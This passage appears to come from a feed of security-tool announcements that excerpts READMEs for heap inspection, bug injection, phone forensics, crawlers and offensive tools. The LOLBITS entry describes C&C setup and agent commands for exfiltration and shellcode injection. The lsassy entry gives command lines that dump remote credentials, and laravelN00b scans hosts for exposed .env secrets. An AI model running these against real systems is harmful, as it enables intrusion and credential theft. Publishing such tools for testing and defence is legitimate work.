print(hs.fastbins)

sleep(10)
#now assume that the heap state has changed
hs.update()                  #use this to refresh

pp = PrettyPrinter(hi)
print(pp.all)                #pretty printer
pp.update()                  #use this to update

Test
There are some testcases.
heapinspect/tests/ $ python test.py  #this will run all test cases for you to check this tool.    ......  ......    test case unsortedbins64 at test/testcases/libc-2.27/64bit  pid:6704  =========================           fastbins           =========================  =========================         unsortedbins         =========================  chunk(0x7f9aae2e6720): prev_size=0x0      size=0xb1     fd=0x7f9aacdfbca0  bk=0x7f9aae2e6880  chunk(0x7f9aae2e6880): prev_size=0x0      size=0xb1     fd=0x7f9aae2e6720  bk=0x7f9aacdfbca0  =========================          smallbins           =========================  =========================          largebins           =========================  =========================            tcache            =========================  tcache[9]:  chunk(0x7f9aae2e6670): prev_size=0x0      size=0xb1     fd=0x7f9aae2e65d0  bk=0x0  chunk(0x7f9aae2e65c0): prev_size=0x0      size=0xb1     fd=0x7f9aae2e6520  bk=0x0  chunk(0x7f9aae2e6510): prev_size=0x0      size=0xb1     fd=0x7f9aae2e6470  bk=0x0  chunk(0x7f9aae2e6460): prev_size=0x0      size=0xb1     fd=0x7f9aae2e63c0  bk=0x0  chunk(0x7f9aae2e63b0): prev_size=0x0      size=0xb1     fd=0x7f9aae2e6310  bk=0x0  chunk(0x7f9aae2e6300): prev_size=0x0      size=0xb1     fd=0x7f9aae2e6260  bk=0x0  chunk(0x7f9aae2e6250): prev_size=0x0      size=0xb1     fd=0x0             bk=0x0

Docs
Detailed docstrings have been written into the source code.
I have built a sphinx doc in docs. Just open docs/build/html/index.html with your browser.

Devlog

2018/12/10 Version 0.1.3
  • add support for gdb

2018/11/6 version 0.1.2
docs update.
  • update sphinx docs
  • reshape file structure

2018/11/5 version 0.1.1
not a functional update.
  • PEP8
  • docstrings
  • performance update

2018/10/31 version 0.1.0
first release
  • better cmdline option

2018/10/30 version 0.0.8
next version will be a release.
  • CRLF to LF
  • code refine
  • readme refine
  • pretty printer

2018/10/29 version 0.0.7
  • auto test
  • code refine

2018/10/27 version 0.0.6
this is not a stable version. im trying to fix bugs due to different glibc. i need help to test this.
  • add multi libc support
  • add x86 support

2018/10/26 version 0.0.5
next version will add multi libc support. heapdiff and heap check will be added later.
  • HeapShower
  • relative heap & libc offset showing
  • fix search loop bug
  • bins now search from bk instead of fd, as the manner of glibc

2018/10/24 version 0.0.4
  • HeapRecoder , I will make a heapdiff
  • smallbins and largebins

2018/10/23 version 0.0.3
  • fastbin prototype
  • unsortedbin prototype
  • bins prototype
  • tcache prototype

2018/10/22 version 0.0.2
  • add C_Struct to handle c structure

2018/10/19 version 0.0.1
  • add class HeapInspector
  • trying to parse more information of arena

2018/10/18 version 0.0.0
  • add class Proc in proc_util
  • experimental test in test.py


Search

LAVA - Large-scale Automated Vulnerability Addition

January 12, 2020, 1:18 pm
$
0
0

Evaluating and improving bug-finding tools is currently difficult due to a shortage of ground truth corpora (i.e., software that has known bugs with triggering inputs). LAVA attempts to solve this problem by automatically injecting bugs into software. Every LAVA bug is accompanied by an input that triggers it whereas normal inputs are extremely unlikely to do so. These vulnerabilities are synthetic but, we argue, still realistic, in the sense that they are embedded deep within programs and are triggered by real inputs. Our work forms the basis of an approach for generating large ground-truth vulnerability corpora on demand, enabling rigorous tool evaluation and providing a high-quality target for tool developers.
LAVA is the product of a collaboration between MIT Lincoln Laboratory, NYU, and Northeastern University.

Quick Start
On a system running Ubuntu 16.04, you should be able to just run python2 setup.py. Note that this install script will install packages and make changes to your system. Once it finishes, you should have PANDA installed into panda/build/ (PANDA is used to perform dynamic taint analysis).
Next, run init-host.py to generate a host.json. This file is used by LAVA to store settings specific to your machine. You can edit these settings as necessary, but the default values should work.
Project configurations are located in the target_configs directory, where every configuration is located at target_configs/projectname/projectname.json. Paths specified within these configuration files are relative to values set in your host.json file.
Finally, you can run ./scripts/lava.sh to actually inject bugs into a program. Just provide the name of a project that is in the target_configs directory, for example:
./scripts/lava.sh toy
You should now have a buggy copy of toy!
If you want to inject bugs into a new target, you will likely need to make some modifications. Check out How-to-Lava for guidance.

Documentation
Check out the docs folder to get started.

Current Status

Version 2.0.0
Expected results from test suite:
Project       RESET    CLEAN    ADD      MAKE     TAINT    INJECT   COMP
blecho        PASS     PASS     PASS     PASS     PASS     PASS     PASS
libyaml       PASS     PASS     PASS     PASS     PASS     PASS     PASS
file          PASS     PASS     PASS     PASS     PASS     PASS     PASS
toy           PASS     PASS     PASS     PASS     PASS     PASS     PASS
pcre2         PASS     PASS     PASS     PASS     PASS     PASS     PASS
jq            PASS     PASS     PASS     PASS     PASS     PASS     PASS
grep          PASS     PASS     PASS     PASS     PASS     FAIL
libjpeg       PASS     PASS     PASS     PASS     FAIL
tinyexpr      PASS     PASS     PASS     PASS     FAIL
duktape       PASS     PASS     PASS     FAIL
tweetNaCl     PASS     PASS     FAIL
gzip          FAIL

Authors
LAVA is the result of several years of development by many people; a partial (alphabetical) list of contributors is below:
  • Andy Davis
  • Brendan Dolan-Gavitt
  • Andrew Fasano
  • Zhenghao Hu
  • Patrick Hulin
  • Amy Jiang
  • Engin Kirda
  • Tim Leek
  • Andrea Mambretti
  • Wil Robertson
  • Aaron Sedlacek
  • Rahul Sridhar
  • Frederick Ulrich
  • Ryan Whelan


Andriller - Software Utility With A Collection Of Forensic Tools For Smartphones

January 13, 2020, 3:30 am
$
0
0

Andriller - is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices. It has features, such as powerful Lockscreen cracking for Pattern, PIN code, or Password; custom decoders for Apps data from Android (some Apple iOS & Windows) databases for decoding communications. Extraction and decoders produce reports in HTML and Excel formats.

Features
  • Automated data extraction and decoding
  • Data extraction of non-rooted without devices by Android Backup (Android versions 4.x, varied/limited support)
  • Data extraction with root permissions: root ADB daemon, CWM recovery mode, or SU binary (Superuser/SuperSU)
  • Data parsing and decoding for Folder structure, Tarball files (from nanddroid backups), and Android Backup (backup.ab files)
  • Selection of individual database decoders for Android apps
  • Decryption of encrypted WhatsApp archived databases (.crypt to .crypt12, must have the right key file)
  • Lockscreen cracking for Pattern, PIN, Password (not gatekeeper)
  • Unpacking the Android backup files
  • Screen capture of a device's display screen

Python Requirements
  • 3.6+ (64-bit version recommended)
It is highly advised to setup a virtual environment to install Andriller and its dependencies in it. However, it is not essential, and the global environment can also be used. Depending on how Python was setup, it may be needed to substitute python and pip to python3 and pip3 retrospectively for the instructions below.
Windows only: when installing Python from https://www.python.org, make sure Add Python to PATH is ticked.

System Dependencies
  • adb
  • python3-tk
[Ubuntu/Debian] Install from Terminal:
$ sudo apt-get install android-tools-adb python3-tk
[Mac] Install from brew cask:
$ brew cask install android-platform-tools
[Windows] : Included.

Installation (from PYPI, recommended)
$ pip install andriller -U

Installation (from source, editable)
$ pip install -e .

Quick Start (run GUI)
$ python -m andriller


laravelN00b - Automated Scan .env Files And Checking Debug Mode In Victim Host

January 13, 2020, 12:51 pm
$
0
0
Incorrect configuration allows you to access .env files or reading env variables. LaravelN00b automated scan .env files and checking debug mode in victim host.



Scan rationale
  • Scan host.
  • Resolve IP adress and check .env file in IP Adress
  • Checking debug mode Laravel ( Read .env variables )

Installation
1 - Install with installer.sh
chmod +x installer.sh
./installer.sh
2 - Install manual
go get github.com/briandowns/spinner
go get github.com/christophwitzko/go-curl
go run main.go --hostname victim.host
or
go build laravelN00b main.go

Run
./laravelN00b --hostname victim.host


SWFPFinder - SWF Potential Parameters Finder

January 14, 2020, 3:30 am
$
0
0

SWFPFinder is a simple and open source bash script designed to discovery the potential swf (file) parameters on the webapp analysing the swf file. SWFPFinder use swfmill tool, swfmill is a tool to process Adobe Flash (SWF) files. It can convert SWF from and to an XML dialect called “swfml”, which is closely modeled after the SWF file format.

Install
$ wget https://raw.githubusercontent.com/m4ll0k/SWFPFinder/master/swfpfinder.sh

or 

$ git clone https://github.com/m4ll0k/SWFPFinder.git swfpfinder
$ cd swfpfinder

Support Platforms
  • MacOSx
  • Linux
  • Window (Cygwin)

Requirements
  • swfmill
    • for linuxapt-get install swfmill
    • for macosx brew install swfmill

Usage
$ bash swfpfinder.sh https://raw.githubusercontent.com/evilcos/xss.swf/master/xss.swf

Event
SecurityErrorEvent
xss_fla
MainTimeline
MovieClip
param
Object
action
String
cmd
attack
get_complete
get_sec_error
frame1
URLLoader
navigateToURL
URLRequest
_self
_blank
COMPLETE
addEventListener
SECURITY_ERROR
ExternalInterface
eval
call
alert
location
open
get
stop
root
loaderInfo
parameters
a
c
addFrameScript
EventDispatcher
DisplayObject
InteractiveObject
DisplayObjectContainer
Sprite


Gtfo - Search For Unix Binaries That Can Be Exploited To Bypass System Security Restrictions

January 14, 2020, 12:30 pm
$
0
0

This is a standalone script written in Python 3 for GTFOBins. You can search for Unix binaries that can be exploited to bypass system security restrictions. These binaries can be abused to
get the f**k
break out of restricted shells, escalate privileges, transfer files, spawn bind and reverse shells, etc...
The functions are from https://github.com/GTFOBins/GTFOBins.github.io and all credit goes to its respective contributors. They are simplified (no need for environmental variables) and syntax highlighted.

Download
git clone https://github.com/t0thkr1s/gtfo

Install
The script has 2 dependencies:
You can install these by typing:
python3 setup.py install

Run
python3 gtfo.py [binary]

Screenshots




Disclaimer
This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.


Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application

January 15, 2020, 3:30 am
$
0
0



hakrawler is a Go web crawler designed for easy, quick discovery of endpoints and assets within a web application. It can be used to discover:
  • Forms
  • Endpoints
  • Subdomains
  • Related domains
  • JavaScript files
The goal is to create the tool in a way that it can be easily chained with other tools such as subdomain enumeration tools and vulnerability scanners in order to facilitate tool chaining, for example:
assetfinder target.com | hakrawler | some-xss-scanner

Features
  • Unlimited, fast web crawling for endpoint discovery
  • Fuzzy matching for domain discovery
  • robots.txt parsing
  • sitemap.xml parsing
  • Plain output for easy parsing into other tools
  • Accept domains from stdin for easier tool chaining
  • SQLMap-friendly output format
  • Link gathering from JavaScript files

Upcoming features

Contributors
  • hakluke wrote the tool
  • cablej cleaned up the code
  • Corben Leo added in functionality to pull links from JavaScript files

Thanks
  • codingo and prodigysml/sml555, my favourite people to hack with. A constant source of ideas and inspiration. They also provided beta testing and a sounding board for this tool in development.
  • tomnomnom who wrote waybackurls, which powers the wayback part of this tool
  • s0md3v who wrote photon, which I took ideas from to create this tool
  • The folks from gocolly, the library which powers the crawler engine
  • oxffaa, who wrote a very efficient sitemap.xml parser which is used in this tool
  • The contributors of LinkFinder where some awesome regex was stolen to parse links from JavaScript files.

Installation
  1. Install Golang
  2. Run the command below
go get github.com/hakluke/hakrawler
  1. Run hakrawler from your Go bin directory. For linux systems it will likely be:
~/go/bin/hakrawler
Note that if you need to do this, you probably want to add your Go bin directory to your $PATH to make things easier!

Usage
Note: multiple domains can be crawled by piping them into hakrawler from stdin. If only a single domain is being crawled, it can be added by using the -domain flag.
$ hakrawler -h
Usage of hakrawler:
  -all
     Include everything in output - this is the default, so this option is superfluous (default true)
  -auth string
     The value of this will be included as a Authorization header
  -cookie string
     The value of this will be included as a Cookie header
  -depth int
     Maximum depth to crawl, the default is 1. Anything above 1 will include URLs from robots, sitemap, waybackurls and the initial crawler as a seed. Higher numbers take longer but yield more results. (default 1)
  -domain string
     The domain that you wish to crawl (for example, google.com)
  -forms
     Include form actions in output
  -js
     Include links to utilised JavaScript files
  -outdir string
     Directory to save discovered raw HTTP requests
  -plain
     Don't use colours or print the banners to allow for easier parsing
  -robots
     Include robots.txt entries in    output
  -schema string
     Schema, http or https (default "http")
  -scope string
     Scope to include:
     strict = specified domain only
     subs = specified domain and subdomains
     fuzzy = anything containing the supplied domain
     yolo = everything (default "subs")
  -sitemap
     Include sitemap.xml entries in output
  -subs
     Include subdomains in output
  -urls
     Include URLs in output
  -usewayback
     Query wayback machine for URLs and add them as seeds for the crawler
  -wayback
     Include wayback machine entries in output
  -linkfinder
      Search all JavaScript files for more links. Note that these will not be complete links, only relative. Parsing full links from JavaScript is too resource intensive.

Basic Example

Image:
Command: hakrawler -domain bugcrowd.com -depth 1


Full text output:
   $ hakrawler -domain bugcrowd.com -depth 1

██╗  ██╗ █████╗ ██╗  ██╗██████╗  █████╗ ██╗    ██╗██╗     ███████╗██████╗
██║  ██║██╔══██╗██║ ██╔╝██╔══██╗██╔══██╗██║    ██║██║     ██╔════╝██╔══██╗
███████║██ ████║█████╔╝ ██████╔╝███████║██║ █╗ ██║██║     █████╗  ██████╔╝
██╔══██║██╔══██║██╔═██╗ ██╔══██╗██╔══██║██║███╗██║██║     ██╔══╝  ██╔══██╗
██║  ██║██║  ██║██║  ██╗█ ║  ██║██║  ██║╚███╔███╔╝███████╗███████╗██║  ██║
╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚══╝╚══╝ ╚══════╝╚══════╝╚═╝  ╚═╝
                        Crafted with <3 by hakluke
[robots] http://bugcrowd.com/*?preview
[sitemap] https://bugcrowd.com/
[sitemap] https://bugcrowd.com/contact/
[sitemap] https://bugcrowd.com/faq/
[sitemap] https://b   ugcrowd.com/leaderboard/
[sitemap] https://bugcrowd.com/list-of-bug-bounty-programs/
[sitemap] https://bugcrowd.com/press/
[sitemap] https://bugcrowd.com/pricing/
[sitemap] https://bugcrowd.com/privacy/
[sitemap] https://bugcrowd.com/terms/
[sitemap] https://bugcrowd.com/resources/responsible-disclosure-program/
[sitemap] https://bugcrowd.com/resources/why-care-about-web-security/
[sitemap] https://bugcrowd.com/resources/what-is-a-bug-bounty/
[sitemap] https://bugcrowd.com/stories/movember/
[sitemap] https://bugcrowd.com/stories/riskio/
[sitemap] https://bugcrowd.com/stories/tagged/
[sitemap] https://bugcrowd.com/tour/
[sitemap] https://bugcrowd.com/tour/platform/
[sitemap] https://bugcrowd.com/tour/crowd/
[sitemap] https://bugcrowd.com/customers/programs/new
[sitemap] https://bugcrowd.com/portal/
[sitemap] https://bugcrowd.com/portal/user/sign_in/
[sitemap] https://bugcrowd.com/portal/user/sign_up/
[url] ht   tps://bugcrowd.com/user/sign_in
[subdomain] bugcrowd.com
[url] https://tracker.bugcrowd.com/user/sign_in
[subdomain] tracker.bugcrowd.com
[url] https://www.bugcrowd.com/
[subdomain] www.bugcrowd.com
[url] https://www.bugcrowd.com/products/how-it-works/
[url] https://www.bugcrowd.com/products/how-it-works/the-bugcrowd-difference/
[url] https://www.bugcrowd.com/products/platform/
[url] https://www.bugcrowd.com/products/platform/integrations/
[url] https://www.bugcrowd.com/products/platform/vulnerability-rating-taxonomy/
[url] https://www.bugcrowd.com/products/attack-surface-management/
[url] https://www.bugcrowd.com/products/bug-bounty/
[url] https://www.bugcrowd.com/products/vulnerability-disclosure/
[url] https://www.bugcrowd.com/products/next-gen-pen-test/
[url] https://www.bugcrowd.com/products/bug-bash/
[url] https://www.bugcrowd.com/resources/reports/priority-one-report
[url] https://www.bugcrowd.com/solutions/<   br/>[url] https://www.bugcrowd.com/solutions/financial-services/
[url] https://www.bugcrowd.com/solutions/healthcare/
[url] https://www.bugcrowd.com/solutions/retail/
[url] https://www.bugcrowd.com/solutions/automotive-security/
[url] https://www.bugcrowd.com/solutions/technology/
[url] https://www.bugcrowd.com/solutions/government/
[url] https://www.bugcrowd.com/solutions/security/
[url] https://www.bugcrowd.com/solutions/marketplace-apps/
[url] https://www.bugcrowd.com/customers/
[url] https://www.bugcrowd.com/hackers/
[url] https://bugcrowd.com/programs
[url] https://bugcrowd.com/crowdstream
[url] https://www.bugcrowd.com/bug-bounty-list/
[url] https://www.bugcrowd.com/hackers/faqs/
[url] https://www.bugcrowd.com/resources/help-wanted/
[url] https://www.bugcrowd.com/hackers/bugcrowd-university/
[url] https://www.bugcrowd.com/hackers/ambassador-program/
[url] https://forum.bugcrowd.com
[subdomain] forum.bugcro   wd.com
[url] https://bugcrowd.com/leaderboard
[url] https://www.bugcrowd.com/resources/levelup-0x04
[url] https://www.bugcrowd.com/resources/
[url] https://www.bugcrowd.com/resources/webinars/
[url] https://www.bugcrowd.com/resources/bakers-dozen/
[url] https://www.bugcrowd.com/events/
[url] https://www.bugcrowd.com/resources/glossary/
[url] https://www.bugcrowd.com/resources/faqs/
[url] https://www.bugcrowd.com/about/
[url] https://www.bugcrowd.com/blog
[url] https://www.bugcrowd.com/about/expertise/
[url] https://www.bugcrowd.com/about/leadership/
[url] https://www.bugcrowd.com/about/press-releases/
[url] https://www.bugcrowd.com/about/careers/
[url] https://www.bugcrowd.com/partners/
[url] https://www.bugcrowd.com/about/news/
[url] https://www.bugcrowd.com/about/contact/
[url] https://bugcrowd.com/user/sign_up
[url] https://www.bugcrowd.com/get-started/
[url] https://www.bugcrowd.com/products/attack-s   urface-management
[url] https://www.bugcrowd.com/products/bug-bounty
[url] https://www.bugcrowd.com/customers/motorola
[url] https://www.bugcrowd.com/products/vulnerability-disclosure
[url] https://www.bugcrowd.com/products/next-gen-pen-test
[url] https://www.bugcrowd.com/resources/guides/esg-research-ciso-security-trends
[url] https://www.bugcrowd.com/events/join-us-at-rsa-2019-march-4-8-2019-san-francisco/
[url] https://www.bugcrowd.com/resources/4-reasons-to-swap-your-traditional-pen-test-with-a-next-gen-pen-test/
[url] https://www.bugcrowd.com/blog/november-2019-hall-of-fame/
[url] https://www.bugcrowd.com/blog/bugcrowd-launches-crowdstream-and-in-platform-coordinated-disclosure/
[url] https://www.bugcrowd.com/blog/the-future-is-now-2020-cybersecurity-predictions/
[url] https://www.bugcrowd.com/press-release/bugcrowd-launches-first-crowd-driven-approach-to-risk-based-asset-discovery-and-prioritization/
[url] https://www.bugcrowd.co   m/press-release/bugcrowd-university-expands-education-and-training-for-whitehat-hackers/
[url] https://www.bugcrowd.com/press-release/bugcrowd-announces-industrys-first-platform-enabled-cybersecurity-assessments-for-marketplaces/
[url] https://www.bugcrowd.com/news/
[url] https://www.bugcrowd.com/events/appsec-cali/
[url] https://www.bugcrowd.com/events
[url] https://www.bugcrowd.com/bugcrowd-security/
[url] https://www.bugcrowd.com/terms-and-conditions/
[url] https://www.bugcrowd.com/privacy/
[javascript] https://www.bugcrowd.com/wp-content/uploads/autoptimize/js/autoptimize_single_de6b8fb8b3b0a0ac96d1476a6ef0d147.js
[javascript] https://www.bugcrowd.com/wp-content/uploads/autoptimize/js/autoptimize_79a2bb0d9a869da52bd3e98a65b0cfb7.js


Shell Backdoor List - PHP / ASP Shell Backdoor List

January 15, 2020, 12:39 pm
$
0
0

What is a shell backdoor ?
A backdoor shell is a malicious piece of code (e.g. PHP, Python, Ruby) that can be uploaded to a site to gain access to files stored on that site. Once it is uploaded, the hacker can use it to edit, delete, or download any files on the site, or upload their own.

How to upload :
Hackers usually take advantage of an upload panel designed for uploading images onto sites. This is usually found once the hacker has logged in as the admin of the site. Shells can also be uploaded via exploits or remote file inclusion, or a virus on the computer.

Uses :
Shells have many uses. They can be used to edit the webserver directory index page of site, and then hackers can leave their mark or "deface" for visitors to the site to see when they go to the homepage. Hackers may also use it to bruteforce FTP or cPanel, allowing them more access to the website. Shells can also be used to gain root access to the site. Some hackers may choose to host malware or spyware on the sites they have uploaded their shell to using various exploits.
  • Please note that many shells contain malware and 'Mark / deface page' might contain malware to obtain visitor's password as well.

Prevention :
To prevent a site from having a shell uploaded onto it, a webmaster must always keep up with the latest security updates and make sure to have a secure admin panel. They must also make sure that if they do have an admin panel they make sure it only permits the user to upload .jpeg, .png, and other image file types only.

Shell Backdoor List :

PHP Shell :

ASP Shell :


Search

LOLBITS - C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol

January 16, 2020, 3:30 am
$
0
0

LOLBITS is a C# reverse shell that uses Microsoft's Background Intelligent Transfer Service (BITS) to communicate with the Command and Control backend. The Command and Control backend is hidden behind an apparently harmless flask web application and it's only accesible when the HTTP requests received by the app contain a valid authentication header.

LOLBITS is composed of 3 main elements:
  • The C# agent that is in charge of executing the commands in the compromised host, sending back the output to the C&C server once the process is done.
  • The flask web application that acts as a dispatcher. This element is the one that allows to hide the C&C infrastructure behind a harmless website at the same time that supplies the new commands to the agent when an authenticated request is received.
  • The C&C console, used to control the agent.
In order to deny proxies content inspection, all the relevant content sent between the agent and the C&C server is encrypted using RC4 with a preshared secret key. A high level diagram of the infrastructure behaviour would be as it's shown in the following diagram:


To avoid that the Blue Team could reproduce some of the old requests and discover the C&C infrastructure, each authentication header is generated randomly and is valid only for one single cycle (a cycle is composed of a POST request followed by a GET request). Old authentication headers will be ignored and the harmless website will be displayed for those requests.

Acknowledgements
Some of this tool features have being implemented reusing code from the CyberVaca's amazing project Salsa Tools, so a big shout-out to him! Here you can find him:

Getting Started

Prerequisites
For the C&C infrastructure is required a Windows Server 2012 or above with python 3.4+ and the following python dependencies:
  • Colorama
pip install colorama
  • Flask
pip install flask
The C# agent has been successfully tested on Windows Server 2016, Windows Server 2019, Windows 8.1 and Windows 10. To compile it it's required:
  • Visual Studio 2017 or above.
  • .NET Framework 4.5 or above.

Setup
1.- Clone this repository on your C&C server
git clone https://github.com/Kudaes/LOLBITS.git
2.- Install Web Server (IIS) through Windows Server Manager. Make sure to install CGI, ASP.NET and .NET Extensibility roles.


Also install .NET Framework and BITS features for IIS.


3.- Install wfastcgi and configure Fast CGI settings in IIS. This is required since our web application is written in Python. For this step to be done I followed up this amazing tutorial, and I recommend you to do the same. Come back to this README when you have completed the tutorial's steps 1 and 2.
4.- Stop the Default website and create a new one using Internet Information Services Manager. Enable BITS uploads for this new website.


5.- Move the content of the C&C folder of this repository to the physical directory where the new website is deployed. Let's say that you have created the new website pointing to your directory C:\inetpub\wwwroot\bits, then this should be that directory tree:
C:\inetpub\wwwroot\bits
     |__ /config            
          |-- auth.txt
     |__ /files
          |-- abcde1234          
          |-- default
     |__ /lolbins
          |-- base64decode.py
          |-- base64encode.py
          |-- a lot of other .py files
     |__ /templates
       |-- index.html
     |__ /static
     |__ /payloads
     |__ -- decrypt.py
     |__ -- encrypt.py
     |__ -- myapp.py
     |__ -- web.config
I recommend to grant full access rights to Everyone for the website directory (C:\inetpub\wwwroot\bits in the example) in order to avoid all kind of access denied errors. At the end this is just a C&C server...
6.- Edit the web.config file. In this file you have to modify two settings:
  • scriptProcessor property for the web handler. For that, go back to the IIS Manager, click on the IIS server's root and select FastCGI Settings (you should have configured this when following the tutorial referenced on the step 3). The value of the scriptProcessor property should be "Full Path|Arguments".

Acording with the previous image, my scriptProcessor property should have the value "c:\python3.4\python.exe|c:\python3.4\lib\site-packages\wfastcgi.py".
  • PYTHONPATH, that should point to your website directory, in this case it would be "C:\inetpub\wwwroot\bits".
7.- Modify the initial setup constants.
  • Select the password to use as preshared key. Set its value in:
    • Program.cs -> Password variable.
    • myapp.py -> Password variable.
    • lawlbin.py -> password variable.
  • Set in the c# agent the url where the flask application is listening.
    • Program.cs -> Url variable.
  • In myapp.py, set the value of the variables AuthPath, ReadPath and Payloads pointing to the correponding folders in the website directory.
  • In lawlbin.py (lolbins folder) set the corresponding values for the variables baseReadPathand baseWritePath acording with your website directory tree.
8.- Compile the agent and execute it in the compromised host. The compilation will generate an exe and an external dependency (Newtonsoft.Json.dll). You can generate a single exe using ILMerge or just send both files. To avoid DEBUG output, compile the project as a Windows Application.


Usage
To obtain the reverse shell just type in python lawlbin.py on a cmd of the C&C server and execute the C# agent on the compromised host.
Since this project borns from the ashes of a previous and failed project, some of the old features have been kept. The old project was a shell where all the available commands would be executed using exclusively Living of The Land Binaries. Thats where the LOL of LOLBITS comes from, and thats why the following features run using exclusively LOLBINS (this could help to bypass AWS and some EDR filters):
  • download: Download a file from a Webdav to the compromised host.
  • copy: Copy a file from a local path to another local path.
  • base64encode: Use base64 encoding over the content of a local file.
  • base64decode: Decode a base64 encoded file.
  • compile: Compile .cs files into exe or dll.
  • execute: Execute different types of files (bat, exe, xml, js, vbs, hta among others). In maintenance!! Broken ATM!!
  • downexec: Download a file from a webdav and execute it. In maintenance!! Broken ATM!!
Despite this features could be interesting in some environments (hmm downloading remote files without using Powershell? I like it!) I kept them just to reuse part of the old code for the C&C console. Below is a list with some features that im sure will be more usefull in a regular situation:
  • inject: Download from the C&C a shellcode (.bin) or dll (.NET assembly) file and execute it in memory. With this command the payload never touches disk unencrypted, avoiding AV detection. Shellcode injection is only implemented for 64 bits procesess. The shellcode injection can be executed on both own and remote process.
  • psh: Generate a remote Powershell version 2 shell. This shell has to be handled by additional sofware like netcat (just run nc -lvp ).
  • send: To send a file from your C&C to the compromised host just use this option. The sent file will be store in disk, so be carefull.
  • getsystem: Attempt to obtain System privileges using named pipes impersonation. High integrity process required.
  • impersonate: Attempt to steal an access token from other process in order to "become" another user.
  • runas: Use valid credentials to modify your security context and log in as other (local or domain) user.
  • rev2self: Remove security context changes performed by getsystem, impersonate or runas.
  • exfiltrate: Send a file from the compromised host to your C&C.
To get usage tips just type in help or <somecommand> help. In the future more features will be implemented, so stay tuned!

Contact
My Twitter
My Linkedin


Lsassy - Extract Credentials From Lsass Remotely

January 16, 2020, 12:30 pm
$
0
0

Python library to remotely extract credentials. This blog post explains how it works.
You can check the wiki
This library uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.

Requirements

Installation

From pip
python3.7 -m pip install lsassy

From sources
python3.7 setup.py install

Basic Usage
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target>

Advanced

Dumping methods
This tool can dump lsass in different ways.
Dumping methods (-m or --method)
  • 0: Try all methods (dll then procdump) to dump lsass, stop on success (Requires -p if dll method fails)
  • 1: comsvcs.dll method, stop on success (default)
  • 2: Procdump method, stop on success (Requires -p)
  • 3: comsvcs.dll + Powershell method, stop on success
  • 4: comsvcs.dll + cmd.exe method

comsvcs.dll method
This method only uses built-in Windows files to extract remote credentials. It uses minidump function from comsvcs.dll to dump lsass process.
This method can only be used when context has SeDebugPrivilege. This privilege is either in Powershell local admin context, or cmd.exe SYSTEM context.
Two execution methods can be used.
  1. WMIExec with cmd.exe (no SeDebugPrivilege), or powershell (SeDebugPrivilege)
  2. ScheduledTasks with SYSTEM context (SeDebugPrivilege)

Procdump method
This method uploads procdump.exe from SysInternals to dump lsass process. It will first try to execute procdump using WMI, and if it fails it will create a remote task, execute it and delete it.

Examples
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 0 -p /path/to/procdump.exe
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 1
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 2 -p /path/to/procdump.exe
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 3
lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 4

Remote parsing only
lsassy can parse an already dumped lsass process.
lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target>

CrackMapExec module
I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts
CrackMapExec module is in cme folder : CME Module

Examples

lsassy
# RunDLL Method
lsassy adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# Procdump Method
lsassy -m 2 -p /tmp/procdump.exe adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# Remote parsing only
lsassy --dumppath C$/Windows/Temp/lsass.dmp adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# NT Hash Authentication
lsassy --hashes 952c28bd2fd728898411b301475009b7 Administrator@desktop01.adsec.local

CME Module
crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound

ChangeLog
v1.1.0
------
* Better execution process : --method flag has been added and described in help text
* Uses random dump name
* Chose between cmd, powershell, dll and/or procdump methods
* CME module is now using light lsassy WMIExec et TASKExec implementation
* Bug fixes

v1.0.0
------
* Built-in lsass dump
** Lsass dump using built-in Windows
** Lsass dump using procdump (using -p parameter)
* Add --dumppath to ask for remote parsing only
* Code refactoring
* Add --quiet to quiet output

v0.2.0
------
* Add BloodHound option to CME module (-o BLOODHOUND=True)
    - Set compromised targets as "owned" in BloodHound
    - Check if compromised users have at least one path to domain admin
* Custom parsing (json, grep, pretty [default])
* New --hashes option to lsassy
* Include CME module    in repository
* Add credentials to CME database


v0.1.0
------
First release

Issues
If you find an issue with this tool (that's very plausible !), please
  • Check that you're using the latest version
  • Send as much details as possible.
    • For standalone lsassy, please use the -d debug flag
    • For CME module, please use CrackMapExec --verbose flag

Acknowledgments

Contributors


Gowitness - A Golang, Web Screenshot Utility Using Chrome Headless

January 17, 2020, 3:30 am
$
0
0

gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line. Both Linux and macOS is supported, with Windows support 'partially working'.
Inspiration for gowitness comes from Eyewitness. If you are looking for something with lots of extra features, be sure to check it out along with these otherprojects.

Installation
All you would need is an installation of the latest Google Chrome or Chromium and gowitness itself. gowitness can be downloaded using go get -u github.com/sensepost/gowitness or using the binaries available for download from the releases page.

Running using docker
To screenshot a page using docker, simply run the following command that would also pull the latest gowitness image:
docker run --rm -it -v $(pwd)/screenshots:/screenshots leonjza/gowitness:latest single --url=https://www.google.com
Keep in mind that a folder needs to be mounted into the container for gowitness to write your screenshots to, otherwise they will be lost when the container exits. The container is configured with the /screenshots/ directory as the working directory, so the above command mounts a local screenshots/ directory there.
If you want to read an nmap file, save it locally into a screenshots directory, and use it with:
docker run --rm -it -v $(pwd)/screenshots:/screenshots leonjza/gowitness:latest nmap -f /screenshots/nmap.xml
